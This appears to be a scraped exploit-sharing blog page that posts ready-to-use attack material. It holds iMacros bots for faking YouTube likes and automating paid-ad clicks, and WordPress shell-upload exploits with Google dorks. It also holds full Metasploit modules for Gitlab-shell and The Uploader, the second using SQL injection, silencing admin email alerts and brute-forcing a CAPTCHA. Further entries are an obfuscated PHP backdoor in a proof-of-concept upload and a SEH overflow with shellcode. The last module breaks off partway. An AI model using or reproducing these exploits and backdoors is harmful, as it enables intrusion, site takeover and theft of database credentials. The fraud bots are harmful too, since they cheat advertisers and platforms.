xDay Exploit

Likesplanet [ Dislike , Likes ] YouTube Videos Exploit [Imacros] Unknown rwxr-xr-x 3 12:42 PM

Filename	Likesplanet [ Dislike , Likes ] YouTube Videos Exploit [Imacros]
Permission	rw-r--r--
Author	Unknown
Date and Time	12:42 PM
Label
Action

# Without the pressure in Like or DisLike

VERSION BUILD=8820413 RECORDER=FX
TAB T=1
URL GOTO=[ xDay-Exploit.blogspot.com ]
TAG POS=1 TYPE=INPUT:SUBMIT ATTR=*
TAB T=2
WAIT SECONDS=2
TAB CLOSE
WAIT SECONDS=7
TAG POS=1 TYPE=INPUT:SUBMIT ATTR=*
TAB T=2
WAIT SECONDS=2
TAB CLOSE
WAIT SECONDS=7
TAG POS=1 TYPE=INPUT:SUBMIT ATTR=*
TAB T=2
WAIT SECONDS=2
TAB CLOSE
WAIT SECONDS=7
TAG POS=1 TYPE=INPUT:SUBMIT ATTR=*
TAB T=2
WAIT SECONDS=2
TAB CLOSE
WAIT SECONDS=7

Change [ xDay-Exploit.blogspot.com ] To :
For YouTube Videos Likes : http://likesplanet.com/ytlike.php
For YouTube Dislike Videos : http://likesplanet.com/ytdislike.php

# Anass Ibn El Farouk

Paidverts [Imacros] Exploit Unknown rwxr-xr-x 1 12:37 PM

Filename	Paidverts [Imacros] Exploit
Permission	rw-r--r--
Author	Unknown
Date and Time	12:37 PM
Label
Action

'Paidverts Auto Clicker Version 1.1
' !!! WARNING !!! DO NOT MAKE AMMENDMENTS TO THE SCRIPT OF ANY SORTS UNLESS YOU KNOW WHAT YOU'RE DOING !!!//
VERSION BUILD=8810214 RECORDER=FX
SET !ERRORIGNORE YES
SET !EXTRACT_TEST_POPUP NO
SET !TIMEOUT_PAGE 15
TAB T=1
URL GOTO=http://paidverts.com
WAIT SECONDS=2.5
TAG POS=1 TYPE=A ATTR=TXT:MEMBERS<SP>HOME<SP>PAGE
WAIT SECONDS=1.5
TAG POS=1 TYPE=SPAN ATTR=TXT:VIEW<SP>PAID<SP>ADS
WAIT SECONDS=1.5
TAG POS=1 TYPE=A ATTR=ID:view-1
WAIT SECONDS=2.5
TAG POS=1 TYPE=DIV ATTR=ID:t-1 EXTRACT=TXT
SET !VAR1 {{!EXTRACT}}
TAG POS=1 TYPE=INPUT:TEXT ATTR=ID:text-1 CONTENT={{!VAR1}}
SET !EXTRACT NULL
WAIT SECONDS=3.5
TAG POS=1 TYPE=DIV ATTR=ID:t-2 EXTRACT=TXT
SET !VAR2 {{!EXTRACT}}
TAG POS=1 TYPE=INPUT:TEXT ATTR=ID:text-2 CONTENT={{!VAR2}}
SET !EXTRACT NULL
WAIT SECONDS=3.5
TAG POS=1 TYPE=DIV ATTR=ID:t-3 EXTRACT=TXT
SET !VAR3 {{!EXTRACT}}
TAG POS=1 TYPE=INPUT:TEXT ATTR=ID:text-3 CONTENT={{!VAR3}}
SET !EXTRACT NULL
WAIT SECONDS=3.5
TAG POS=1 TYPE=INPUT:SUBMIT ATTR=ID:view_ad
WAIT SECONDS=3
TAB T=2
WAIT SECONDS=35
TAG POS=1 TYPE=INPUT:SUBMIT ATTR=ID:button
WAIT SECONDS=8
TAB T=1
TAB CLOSEALLOTHERS
WAIT SECONDS=2.5
TAG POS=1 TYPE=A ATTR=TXT:View<SP>another<SP>ad
WAIT SECONDS=10
' End of Code

Wordpress Lazy SEO plugin 1.1.9 - Shell Upload Vulnerability Unknown rwxr-xr-x 1 10:22 AM

Filename	Wordpress Lazy SEO plugin 1.1.9 - Shell Upload Vulnerability
Permission	rw-r--r--
Author	Unknown
Date and Time	10:22 AM
Label
Action

#######################################################################
# Exploit Title : Wordpress Lazy SEO plugin Shell Upload Vulnerability
# Exploit Author : Ashiyane Digital Security Team
# Google Dork: : inurl:/wp-content/plugins/lazy-seo/
# Date: 2013/09/21
# Software Link : http://downloads.wordpress.org/plugin/lazy-seo.1.1.9.zip
# Version : 1.1.9
# Tested on: Windows
##############
#
#Location: Site/wp-content/plugins/lazy-seo/lazyseo.php
#
##############
#1.Go to address : Site/wp-content/plugins/lazy-seo/lazyseo.php
#2.Click on Browse...
#3.Select Shell Code
#3.Complete the fields
#4.Press Enter
#5.Shell Address : wp-content/plugins/lazy-seo/Shell.php
##############

Gitlab-shell Code Execution Unknown rwxr-xr-x 1 10:20 AM

Filename	Gitlab-shell Code Execution
Permission	rw-r--r--
Author	Unknown
Date and Time	10:20 AM
Label
Action

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'net/ssh'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager

def initialize(info = {})
super(update_info(info,
'Name' => 'Gitlab-shell Code Execution',
'Description' => %q(
This module takes advantage of the addition of authorized
ssh keys in the gitlab-shell functionality of Gitlab. Versions
of gitlab-shell prior to 1.7.4 used the ssh key provided directly
in a system call resulting in a command injection vulnerability. As
this relies on adding an ssh key to an account valid credentials
are required to exploit this vulnerability.
),
'Author' =>
[
'Brandon Knight'
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://about.gitlab.com/2013/11/04/gitlab-ce-6-2-and-5-4-security-release/'],
['CVE', '2013-4490']
],
'Platform' => 'linux',
'Targets' =>
[
[ 'Linux',
{
'Platform' => 'linux',
'Arch' => ARCH_X86
}
],
[ 'Linux (x64)',
{
'Platform' => 'linux',
'Arch' => ARCH_X86_64
}
],
[ 'Unix (CMD)',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' =>
{
'RequiredCmd' => 'openssl perl python'
},
'BadChars' => "\x22"
}
}
],
[ 'Python',
{
'Platform' => 'python',
'Arch' => ARCH_PYTHON,
'Payload' =>
{
'BadChars' => "\x22"
}
}
]
],
'CmdStagerFlavor' => %w( bourne printf ),
'DisclosureDate' => 'Nov 4 2013',
'DefaultTarget' => 0))

register_options(
[
OptString.new('USERNAME', [true, 'The username to authenticate as', 'root']),
OptString.new('PASSWORD', [true, 'The password for the specified username', '5iveL!fe']),
OptString.new('TARGETURI', [true, 'The path to Gitlab', '/'])
], self.class)
end

def exploit
login
case target['Platform']
when 'unix'
execute_command(payload.encoded)
when 'python'
execute_command("python -c \\\"#{payload.encoded}\\\"")
when 'linux'
execute_cmdstager(temp: './', linemax: 2800)
end
end

def execute_command(cmd, _opts = {})
key_id = add_key(cmd)
delete_key(key_id)
end

def check
res = send_request_cgi('uri' => normalize_uri(target_uri.path.to_s, 'users', 'sign_in'))
if res && res.body && res.body.include?('GitLab')
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Unknown
end
end

def login
username = datastore['USERNAME']
password = datastore['PASSWORD']
signin_page = normalize_uri(target_uri.path.to_s, 'users', 'sign_in')

# Get a valid session cookie and authenticity_token for the next step
res = send_request_cgi(
'method' => 'GET',
'cookie' => 'request_method=GET',
'uri' => signin_page
)

fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during login") unless res

local_session_cookie = res.get_cookies.scan(/(_gitlab_session=[A-Za-z0-9%-]+)/).flatten[0]
auth_token = res.body.scan(/<input name="authenticity_token" type="hidden" value="(.*?)"/).flatten[0]

if res.body.include? 'user[email]'
@gitlab_version = 5
user_field = 'user[email]'
else
@gitlab_version = 7
user_field = 'user[login]'
end

# Perform the actual login and get the newly assigned session cookie
res = send_request_cgi(
'method' => 'POST',
'cookie' => local_session_cookie,
'uri' => signin_page,
'vars_post' =>
{
'utf8' => "\xE2\x9C\x93",
'authenticity_token' => auth_token,
"#{user_field}" => username,
'user[password]' => password,
'user[remember_me]' => 0
}
)

fail_with(Failure::NoAccess, "#{peer} - Login failed") unless res && res.code == 302

@session_cookie = res.get_cookies.scan(/(_gitlab_session=[A-Za-z0-9%-]+)/).flatten[0]

fail_with(Failure::NoAccess, "#{peer} - Unable to get session cookie") if @session_cookie.nil?
end

def add_key(cmd)
if @gitlab_version == 5
@key_base = normalize_uri(target_uri.path.to_s, 'keys')
else
@key_base = normalize_uri(target_uri.path.to_s, 'profile', 'keys')
end

# Perform an initial request to get an authenticity_token so the actual
# key addition can be done successfully.
res = send_request_cgi(
'method' => 'GET',
'cookie' => "request_method=GET; #{@session_cookie}",
'uri' => normalize_uri(@key_base, 'new')
)

fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res

auth_token = res.body.scan(/<input name="authenticity_token" type="hidden" value="(.*?)"/).flatten[0]
title = rand_text_alphanumeric(16)
key_info = rand_text_alphanumeric(6)

# Generate a random ssh key
key = OpenSSL::PKey::RSA.new 2048
type = key.ssh_type
data = [key.to_blob].pack('m0')

openssh_format = "#{type} #{data}"

# Place the payload in to the key information to perform the command injection
key = "#{openssh_format} #{key_info}';#{cmd}; echo '"

res = send_request_cgi(
'method' => 'POST',
'cookie' => "request_method=GET; #{@session_cookie}",
'uri' => @key_base,
'vars_post' =>
{
'utf8' => "\xE2\x9C\x93",
'authenticity_token' => auth_token,
'key[title]' => title,
'key[key]' => key
}
)

fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res

# Get the newly added key id so it can be used for cleanup
key_id = res.headers['Location'].split('/')[-1]

key_id
end

def delete_key(key_id)
res = send_request_cgi(
'method' => 'GET',
'cookie' => "request_method=GET; #{@session_cookie}",
'uri' => @key_base
)

fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res

auth_token = res.body.scan(/<meta content="(.*?)" name="csrf-token"/).flatten[0]

# Remove the key which was added to clean up after ourselves
res = send_request_cgi(
'method' => 'POST',
'cookie' => "#{@session_cookie}",
'uri' => normalize_uri("#{@key_base}", "#{key_id}"),
'vars_post' =>
{
'_method' => 'delete',
'authenticity_token' => auth_token
}
)

fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res
end
end

WordPress Slideshow Gallery Plugin 1.4.6 - Shell Upload Vulnerability Unknown rwxr-xr-x 1 10:20 AM

Filename	WordPress Slideshow Gallery Plugin 1.4.6 - Shell Upload Vulnerability
Permission	rw-r--r--
Author	Unknown
Date and Time	10:20 AM
Label
Action

Summary: WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell upload vulnerability.
Date: 2014-08-28
Vendor Homepage: http://tribulant.com/
Software: Slideshow Gallery
Version: 1.4.6
Software Link: http://downloads.wordpress.org/plugin/slideshow-gallery.1.4.6.zip
Tested on: Windows 7 OS, Wordpress 3.9.2 and Chrome Browser.

Description:

I found a serious security vulnerability in the Slideshow Gallery plugin. This bug allows an attacker to upload any php file remotely to the vulnerable website (administrator by default). I have tested and verified that having the current version of the plugin installed in a WordPress installation will allow any registered user (Administrator, Editor, Author, Contributor and Subscriber), to upload a PHP shell to exploit the host system.

Backdoor location: http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php

Today (2014-08-29), I did the notification to vendor and they gave me feedback about the vulnerability by email. The vendor has released a patch a few hours ago. (SlideShow Gallery version 1.4.7 at https://wordpress.org/plugins/slideshow-gallery/changelog).

Proof of Concept (PoC):

1. An attacker uploads a PHP shell file (i.e. backdoor.php):

POST http://192.168.31.128/wordpress/wp-admin/admin.php?page=slideshow- slides&method=save HTTP/1.1
Host: 192.168.31.128
Connection: keep-alive
Content-Length: 2168
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://192.168.31.128
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEGMugMZ1CVkRzbxV DNT: 1
Referer: http://192.168.31.128/wordpress/wp-admin/admin.php?page=slideshow- slides&method=save
Accept-Encoding: gzip,deflate
Accept-Language: es-ES,es;q=0.8,en;q=0.6,it;q=0.4,und;q=0.2
Cookie: wordpress_a8ed7709a5b8081c924ceda6269a7962=master%7C1409465845%7C9ee160d2851bbcdaa2865 e9010d92d46; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_a8ed7709a5b8081c924ceda6269a7962=master%7C1409465845%7C0565892d6d7 f9de1022e4ad95b45d4ac; wp-settings-1=libraryContent%3Dupload%26editor%3Dtinymce; wp- settings-time-1=1409293045
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[id]"

------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[order]"

------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[title]"

Test Shell Upload
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[description]"

------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[showinfo]"

both
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[iopacity]"

70
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[galleries][]"

1
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[type]"

file
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="image_file"; filename="backdoor.php"
Content-Type: application/octet-stream

<?php
$kvgk = str_replace("y","","ysytyry_yreypylyayce"); $dawj="pdGV4cGxvaXQnO2VzhjaGzh8gJzwnLiRrzhLic+JzzhtldmFsKGJhc2U2NF9kZWNvZGUz"; $asrp="gnJywnKycpLCBqb2luKGFycmF5X3NsaWNlKCRhLCRjKzhCRhKS0zKSkpKSk7ZWzhNobyAnPC8nLzhiR rLic+Jzt9"; $gxfr="hocHJlZ19yzhZXBsYzhWNlKzhGFycmF5KCcvW15cdz1cc1zh0vJywnzhLzh1xzzhLycpLCBhcnJheSz h"; $fdcd="JGM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihzhyZXNldCgkYSk9PSd3zhaCcgJiYgJGMzhoJGEpPjMpe zhyRrPSd";
$uuod = $kvgk("j", "", "bjase6j4j_jdjejcjojde");
$qcon = $kvgk("av","","avcraveaavteav_avfavuavnavcavtiavoavn");
$rpgy = $qcon('', $uuod($kvgk("zh", "", $fdcd.$dawj.$gxfr.$asrp))); $rpgy();
?>
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[image_url]"

------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[uselink]"

N

------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[link]"

------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[linktarget]"

self
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="submit"

Save Slide
------WebKitFormBoundaryEGMugMZ1CVkRzbxV--

2. The backdoor is located at http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php

3. The attacker uses a security tool (i.e. weevely) in order to communicate with the backdoor.

#weevely http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php whitexploit

Now the attacker has a “telnet-like console”. Finally, the attacker has the remote control of the
vulnerable website.

Vulnerability Disclosure Timeline:
2014-08-28: Discovered vulnerability
2014-08-29: Vendor Notification (support@tribulant.com)
2014-08-29: Vendor Response/Feedback
2014-08-29: Vendor Fix/Patch
2014-08-30: Public Disclosure

The Uploader 2.0.4 (Eng/Ita) Remote File Upload Remote Code Execution Unknown rwxr-xr-x 0 10:19 AM

Filename	The Uploader 2.0.4 (Eng/Ita) Remote File Upload Remote Code Execution
Permission	rw-r--r--
Author	Unknown
Date and Time	10:19 AM
Label
Action

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'The Uploader 2.0.4 (Eng/Ita) Remote File Upload',
'Description'=> %q{
This module exploits various flaws in The Uploader to upload a PHP payload
to target system. When run with defaults it will search possible URIs for
the application and exploit it automatically. Works against both English
and Italian language versions. Notably it disables pre-emptive email warnings
before uploading the payload, though it leaves log cleanup as a
post-exploitation task.
},
'Author' => [ 'Danny Moules' ],
'References' =>
[
[ 'URL', 'http://sourceforge.net/projects/theuploader' ],
[ 'CVE', '2011-2944' ],
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Keys' => ['php'],
},
'License' => MSF_LICENSE,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [[ 'Automatic', { }]],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 23 2012',
))

register_options([
Opt::RHOST,
Opt::RPORT(80),
OptString.new(
'URI',
[ true, 'Path of application root (default will try common targets)', '/' ]
),
OptInt.new(
'CRACKATTEMPTS',
[ true, 'Brute force attempts, if required, to crack CAPTCHA', 200 ]
),
OptBool.new(
'VERBOSE',
[ true, 'Verbose output', true ]
),
], self.class)
end

def get_strings(lang)
if lang == "Eng"
strings = {
"sqlisuccess" => /Log-In has been done successfully/,
"whitelistsuccess" => /The extension has been added successfully/,
"disablemailsuccess" => /Notification Mail section has been saved successfully/,
"changedirsuccess" => /Edit Upload Folder section has been saved successfully/,
"captcharequired" => /No result entered/,
"uploadsuccess" => /Download Link/,
"disablecaptchasuccess" =>
/Upload Permissions section has been saved successfully/,
}
elsif lang == "Ita"
strings = {
"sqlisuccess" => /stato effettuato con successo/,
"whitelistsuccess" => /L'estensione è stata consentita con successo/,
"disablemailsuccess" => /Mail di Notifica è stata salvata con successo/,
"changedirsuccess" =>
/Modifica Cartella Upload è stata salvata con successo/,
"captcharequired" => /Non à stato inserito nessun risultato/,
"uploadsuccess" => /Link al download/,
"disablecaptchasuccess" => /Permessi Upload è stata salvata con successo/,
}
end
return strings
end

def exploit
#Analyse target
analysis = analyse(datastore['URI'])
print_status(analysis['status'])
strings = get_strings(analysis['lang'])
unless analysis['uri'].nil?
datastore['URI'] = analysis['uri']
end

#Attempt SQLi - Gets the 'first' valid admin account
data = "username=' OR activated=1-- a"
data << "&password=a"
data << "&login=Log-IN"

res = send_and_verify(
datastore['URI'] + "login.php",
"POST",
"application/x-www-form-urlencoded",
"",
data,
"SQL injection",
strings['sqlisuccess']
)

#Get cookies
unless res.headers.include?('Set-Cookie')
raise RuntimeError.new("Nobody gave us a cookie =( SQLi failed")
end
choc_chip = res.headers['Set-Cookie']
if datastore["VERBOSE"]
print_good("I stole the cookie from the cookie jar: #{choc_chip}")
end

#Optionally, analyse configuration
if datastore["VERBOSE"]
begin
config = analyse_config(strings, choc_chip)
print_status("INFO: Database host is #{config['db_host']}")
print_status("INFO: Database username is #{config['db_user']}")
print_status("INFO: Database password is #{config['db_pass']}")
print_status("INFO: Database name is #{config['db_name']}")
print_status("INFO: Admin log is #{config['admin_log']}")
rescue ::Exception => e
err = "Non-fatal error. Failed to analyse configuration: "
err << "#{e.class.to_s} #{e.to_s}"
print_error(err)
end
end

#Whitelist .php extensions for upload
res = send_and_verify(
datastore['URI'] + "admin/ajaxmanager.php?section=upload&category=extensionadd",
"POST",
"application/x-www-form-urlencoded",
choc_chip,
"allowed_ext=php",
"Whitelisting .php extensions",
strings['whitelistsuccess']
)

# Disable email reporting
res = send_and_verify(
datastore['URI'] + "admin/ajaxmanager.php?section=upload&category=mail",
"POST",
"application/x-www-form-urlencoded",
choc_chip,
"upload_email=0",
"Disabling email reporting",
strings['disablemailsuccess']
)

# Change upload location to suit us
data = "upload_directory="
data << "&upload_full="
data << datastore['RHOST']
data << datastore['URI']

res = send_and_verify(
datastore['URI'] + "admin/ajaxmanager.php?section=upload&category=uploaddir",
"POST",
"application/x-www-form-urlencoded",
choc_chip,
data,
"Changing upload directory to application root",
strings['changedirsuccess']
)

#Disable CAPTCHA on upload (non-fatal)
begin
res = send_and_verify(
datastore['URI'] + "admin/ajaxmanager.php?section=upload&category=captcha",
"POST",
"application/x-www-form-urlencoded",
choc_chip,
"captcha_upload=0",
"Disabling CAPTCHA on upload",
strings['disablecaptchasuccess']
)
rescue ::Exception
print_error("Disabling CAPTCHA on upload failed. Will use cracker if necessary.")
end

#Upload PHP payload
upload_uri = "ajax/upload.php"
filename = "#{rand_text_alphanumeric(8)}.php"
boundary = rand_text_alphanumeric(8)
data = %Q{
--#{boundary}
Content-Disposition: form-data; name="upfile_1"; filename="#{filename}"
Content-Type: text/plain

<?php #{payload.encoded} ?>
--#{boundary}
}

res = send_request_raw({
'uri' => datastore['URI'] + upload_uri,
'method' => 'POST',
'data' => data + '--',
'headers' =>
{
'Cookie' => choc_chip,
'Content-Type' => 'multipart/form-data; boundary=' + boundary,
'Content-Length' => data.length + 2,
},
}, 20)

#Verify response
if res.code != 200
raise RuntimeError.new("Uploading payload failed (HTTP code #{res.code.to_s})")
end

# If failure due to CAPTCHA, crack that...
if res.body =~ strings['captcharequired']
crack_captcha(data, choc_chip, boundary, upload_uri, strings)
else
if res.body =~ strings['uploadsuccess']
if datastore["VERBOSE"]
print_good("Uploading payload succeeded, triggering...")
end
else
err = "Response doesn't look right."
err << " Uploading payload probably failed (will continue anyway)"
print_error(err)
end
end

#Attempt to trigger payload
res = send_request_cgi({
'uri' => datastore['URI'] + filename,
'method' => 'GET',
'headers' =>
{
'Cookie' => choc_chip,
},
}, 5)

#Verify response
if res and res.code != 200
err = "Triggering payload (/#{filename}) failed "
err << "(HTTP code #{res.code.to_s})"
raise RuntimeError.new(err)
else
print_good("Triggering payload (/#{filename}) successful")
end
end

def crack_captcha(data, choc_chip, boundary, upload_uri, strings)
captcha_failed = true
print_status("CAPTCHA is enabled. Transforming into brute-force CAPTCHA cracker *ping*")

crack_data = %Q{
#{data}
Content-Disposition: form-data; name="result"

0
--#{boundary}
}

patience = datastore['CRACKATTEMPTS']
for i in (1..patience)

#First visit index page to trigger CAPTCHA reset
res = send_request_cgi({
'uri' => datastore['URI'] + "index.php",
'method' => 'GET',
'headers' =>
{
'Cookie' => choc_chip
},
}, 20)

#Now try CAPTCHA with result 0. It'll happen eventually (1/30ish chance).
#Maths-based CAPTCHAs are educational kids!
res = send_request_raw({
'uri' => datastore['URI'] + upload_uri,
'method' => 'POST',
'data' => crack_data + '--',
'headers' =>
{
'Cookie' => choc_chip,
'Content-Type' => 'multipart/form-data; boundary=' + boundary,
'Content-Length' => crack_data.length + 2,
},
}, 20)

if res.body =~ strings['uploadsuccess']
captcha_failed = false
break
end
end

if captcha_failed
err = "Could not break CAPTCHA in #{patience.to_s} iterations."
err << " You might have luck retrying."
raise RuntimeError.new(err)
else
print_good("CAPTCHA broken. Transforming back into a mild-mannered exploit *ping*")
end
end

def send_and_verify(uri, method, ctype, cookie, data, intent, check)
res = send_request_raw({
'uri' => uri,
'method' => method,
'data' => data,
'headers' =>
{
'Cookie' => cookie,
'Content-Type' => ctype,
'Content-Length' => data.length,
},
}, 20)

#Verify response
if res.code != 200
raise RuntimeError.new("#{intent} failed (HTTP code #{res.code.to_s})")
end
unless res.body =~ check
raise RuntimeError.new("Response doesn't look right. #{intent} probably failed")
end

if datastore["VERBOSE"]
print_good("#{intent} succeeded")
end

return res
end

def analyse(uri_set)
code = nil
found_uri = nil
status = "Unknown state"
lang = "Eng"

unless uri_set =~ /\/$/ then
uri_set = "#{uri_set}/"
print_status("URI automatically changed to #{uri_set}")
end

unless uri_set =~ /^\// then
uri_set = "/#{uri_set}"
print_status("URI automatically changed to #{uri_set}")
end

if uri_set == "/" then
uris = [ "/", "/upload/", "/uploader/", "/theuploader/",
"/the_uploader/", "/The%20Uploader/",
"/The%20Uploader%202.0.4%20-%20Eng/", "/The%20Uploader%202.0.4%20-%20Ita/"
]
else
uris = [ uri_set ]
end

uris.each do |uri|
res = send_request_cgi({
'uri' => uri + "index.php",
'method' => 'GET',
}, 20)

if res and res.code == 200
if res.body =~ /The Uploader 2\.0/
status = "2.0.* version found at #{uri}"
code = Exploit::CheckCode::Vulnerable
found_uri = uri
elsif res.body =~ /The Uploader/
status = "Detected unknown version at #{uri}"
code = Exploit::CheckCode::Detected
found_uri = uri
end

unless found_uri.nil?
#Set appropriate language
if res.body =~ /Sezione Upload/
lang = "Ita"
end

http_fingerprint({ :response => res })
break
end
end
end

if found_uri.nil?
if uri_set == "/"
status = "Could not find the web site automatically. Enter URI manually?"
else
status = "Could not find the web site."
status << " Use the default URI to search for the web site automatically"
end
code = Exploit::CheckCode::Safe
end

return { "code" => code, "uri" => found_uri, "lang" => lang, "status" => status }
end

def analyse_config(strings, cookie)
#Acquire the database details
res = send_request_cgi({
'uri' => datastore['URI'] + "admin.php?section=upload&category=server",
'method' => 'GET',
'headers' =>
{
'Cookie' => cookie
},
}, 20)
unless res and res.code == 200
raise RuntimeError.new("Acquiring database details failed")
end
r = /<input[^>]*name="host"[^>]*value="([^"]*)".*\/>/
db_host = r.match(res.body)[1]
r = /<input[^>]*name="user"[^>]*value="([^"]*)".*\/>/
db_user = r.match(res.body)[1]
r = /<input[^>]*name="pass"[^>]*value="([^"]*)".*\/>/
db_pass = r.match(res.body)[1]
r = /<input[^>]*name="dbnm"[^>]*value="([^"]*)".*\/>/
db_name = r.match(res.body)[1]

#Acquire the admin log details
res = send_request_cgi({
'uri' => datastore['URI'] + "admin.php?section=admin&category=admin_log",
'method' => 'GET',
'headers' =>
{
'Cookie' => cookie
},
}, 20)
unless res and res.code == 200
raise RuntimeError.new("Acquiring admin log details failed")
end
r = /<input[^>]*name="admin_log"[^>]*checked.*\/>/
if r.match(res.body)
admin_log = "active"
else
admin_log = "inactive"
end

return {
"db_host" => db_host, "db_user" => db_user, "db_pass" => db_pass,
"db_name" => db_name, "admin_log" => admin_log,
}
end

def check
analysis = analyse("/")
print_status(analysis['status'])
return analysis['code']
end
end

Wordpress Font Uploader Plugin 1.2.4 - Arbitrary File Upload Unknown rwxr-xr-x 0 10:18 AM

Filename	Wordpress Font Uploader Plugin 1.2.4 - Arbitrary File Upload
Permission	rw-r--r--
Author	Unknown
Date and Time	10:18 AM
Label
Action

##################################################
# Description : Wordpress Plugins - WordPress Font Uploader Shell Upload
Vulnerability
# Version : 1.2.4
# Link : http://wordpress.org/extend/plugins/font-uploader/
# Plugins : http://downloads.wordpress.org/plugin/font-uploader.1.2.4.zip
# Date : 01-06-2012
# Google Dork : inurl:/wp-content/plugins/font-uploader/
##################################################

Exploit :

PostShell.php
<?php

$uploadfile="lo.php.ttf";
$ch =
curl_init("http://server/wordpress/wp-content/plugins/font-uploader/font-upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('font'=>"@$uploadfile",
'Submit'=>'submit'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access :
http://www.exemple.com/wordpress/wp-content/plugins/font-uploader/fonts/lo.php.ttf

lo.php.ttf
<?php
phpinfo();
?>

Calavera UpLoader 3.5 - SEH Buffer Overflow Unknown rwxr-xr-x 0 10:17 AM

Filename	Calavera UpLoader 3.5 - SEH Buffer Overflow
Permission	rw-r--r--
Author	Unknown
Date and Time	10:17 AM
Label
Action

#relleno

rell = "\x41"* 477
rell1 = "\x42"* 4000

head = "\x41"* 8
head += "\x0d\x0a\x31\x0d\x0a"
head1 = "\x0d\x0a"
head2 = "170.1.1.0"
head2 +="\x0d\x0a"
head2 +="\x22"
head2 += "C:\Archivos2de2programa\Uploader!\Uploader!23151EXE"
head2 +="\x22"

# shellcode para calc.exe

shellcode = "\x33\xD2\xB2\x50\x80\xF2\x55\x52\xC6\x45"
shellcode += "\x31\x63\xC6\x45\x32\x61\xC6\x45\x33\x6C"
shellcode += "\xC6\x45\x34\x63\xC6\x45\x35\x2E\xC6\x45\x36\x65"
shellcode += "\xC6\x45\x37\x78\xC6\x45\x38\x65\x88\x45"
shellcode += "\x39\x8D\x45\x31\x50\xB9\x31\x75\x66\x31"
shellcode += "\x81\xF1\x69\x4D\x26\x31\xFF\xe1"

# Next SHE
Nshe = "\xeb\x06\x90\x90"
# POP POP RETN
PPR = "\x38\xbf\x40\x00"

explo = (head + rell + Nshe + PPR + shellcode + rell1 + head1 + head2)
arch = open ("uploadpref.dat", "w")

arch.write(explo)
arch.close

HybridAuth install.php PHP Code Execution Unknown rwxr-xr-x 0 10:16 AM

Filename	HybridAuth install.php PHP Code Execution
Permission	rw-r--r--
Author	Unknown
Date and Time	10:16 AM
Label
Action

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking # application config.php is overwritten

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'HybridAuth install.php PHP Code Execution',
'Description' => %q{
This module exploits a PHP code execution vulnerability in
HybridAuth versions 2.0.9 to 2.2.2. The install file 'install.php'
is not removed after installation allowing unauthenticated users to
write PHP code to the application configuration file 'config.php'.

Note: This exploit will overwrite the application configuration file
rendering the application unusable.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Pichaya Morimoto', # Discovery and PoC
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
],
'References' =>
[
['EDB', '34273'],
['OSVDB','109838']
],
'Arch' => ARCH_PHP,
'Platform' => 'php',
'Targets' =>
[
# Tested:
# HybridAuth versions 2.0.9, 2.0.10, 2.0.11, 2.1.2, 2.2.2 on Apache/2.2.14 (Ubuntu)
['HybridAuth version 2.0.9 to 2.2.2 (PHP Payload)', {}]
],
'Privileged' => false,
'DisclosureDate' => 'Aug 4 2014',
'DefaultTarget' => 0))

register_options(
[
